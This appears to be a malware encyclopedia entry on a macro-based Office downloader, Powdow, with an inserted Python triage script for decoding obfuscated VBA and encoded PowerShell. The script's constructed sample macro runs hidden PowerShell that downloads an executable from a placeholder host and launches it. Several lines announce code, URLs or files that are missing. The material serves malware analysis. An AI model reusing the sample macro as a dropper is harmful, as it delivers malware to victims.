First posted on 03 November 2017.
There are no other names known for TrojanDownloader:O97M/Powdow.
This threat typically arrives as a document attached to spam email. The document tries to trick the user into enabling macros, for example:
Once macros are enabled, the obfuscated macro code launches an obfuscated PowerShell script:
Decrypted, the PowerShell script looks like:
The PowerShell script then downloads the final payload from the following URLs:
Downloads other malware
Through the PowerShell script, the macro downloads other malware, including PWS:Win32/Fareit.P.
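The macro-to-PowerShell-to-download chain described above is what an analyst has to unwind when triaging a document like this. The following is an added example, not code from this write-up or from the Powdow sample: it takes the text of a VBA macro, undoes simple string concatenation and Chr() obfuscation, finds a PowerShell -EncodedCommand argument, decodes it (Base64 of UTF-16LE text) and pulls out the URLs and download/execute primitives of the resulting script. The macro and PowerShell command it runs against are constructed for the example and are not the real malware's code; the URLs use the reserved .invalid domain.

```python
"""Triage helper for Office macro downloaders (added example).

The VBA macro and PowerShell command below are CONSTRUCTED to resemble
a macro -> encoded PowerShell -> download chain. They are not taken from
the Powdow sample or from the write-up.
"""
import base64
import re

# powershell[.exe] ... -Enc <base64>; PowerShell accepts any unambiguous
# prefix of -EncodedCommand, so match the common abbreviations too.
ENCODED_CMD_RE = re.compile(
    r"(?i)powershell(?:\.exe)?[^\r\n\"']*?"
    r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})"
)
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"<>)]+")
# Download / execution primitives commonly seen in such PowerShell stages.
SUSPICIOUS_CMDLETS = ("DownloadFile", "DownloadString", "Invoke-WebRequest",
                      "Start-Process", "Invoke-Expression", "IEX")
# VBA entry points that run when the document is opened.
VBA_AUTOEXEC = ("AutoOpen", "Document_Open", "Workbook_Open")
# VBA constructs used to launch an external program.
VBA_EXEC = ("Shell", "WScript.Shell", "CreateObject")


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as Base64 over UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def deobfuscate_vba_strings(vba: str) -> str:
    """Undo two cheap VBA string-splitting tricks so the indicator
    regexes see the real text."""
    # "ab" & Chr(46) & "cd"  ->  "ab.cd"
    text = re.sub(r"\"\s*&\s*Chr\((\d+)\)\s*&\s*\"",
                  lambda m: chr(int(m.group(1))), vba)
    # "ab" & "cd" (optionally split over a ' _' line continuation) -> "abcd"
    return re.sub(r"\"\s*[&+]\s*(?:_\s*\r?\n\s*)?\"", "", text)


def triage_macro(vba: str) -> dict:
    """Return the indicators found in one macro's source text."""
    text = deobfuscate_vba_strings(vba)
    result = {
        "autoexec": [k for k in VBA_AUTOEXEC if k in text],
        "exec_primitives": [k for k in VBA_EXEC if k in text],
        "encoded_commands": [],
        "urls": [],
        "suspicious_cmdlets": [],
    }
    for blob in ENCODED_CMD_RE.findall(text):
        try:
            script = decode_encoded_command(blob)
        except (ValueError, UnicodeDecodeError):
            continue  # not a well-formed encoded command; skip it
        result["encoded_commands"].append(script)
        result["urls"].extend(URL_RE.findall(script))
        result["suspicious_cmdlets"].extend(
            c for c in SUSPICIOUS_CMDLETS if c.lower() in script.lower())
    return result


# ---- constructed sample input (not the real malware) -------------------
SAMPLE_PS = (
    "$u='http://example.invalid/one.exe','http://example.invalid/two.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient)"
    ".DownloadFile($x,\"$env:TEMP\\svc.exe\");"
    "Start-Process \"$env:TEMP\\svc.exe\";break}catch{}}"
)
_ENC = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii")
SAMPLE_VBA = f'''Sub AutoOpen()
    Dim c As String
    c = "pow" & "ersh" & "ell.exe -NoP -W Hidden -Enc " & "{_ENC}"
    CreateObject("WScript" & Chr(46) & "Shell").Run c, 0
End Sub
'''

if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Real droppers often add layers this helper does not handle (cmd.exe wrappers, string reversal, the "decrypted" stage mentioned above that unpacks a further script), so treat the output as a starting point for manual analysis rather than a verdict. Extract the macro text first, for example with the olevba tool from the oletools package, and feed it to triage_macro.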
We have seen the following files downloaded from those URLs:
Analysis by Duc Nguyen
Last update 03 November 2017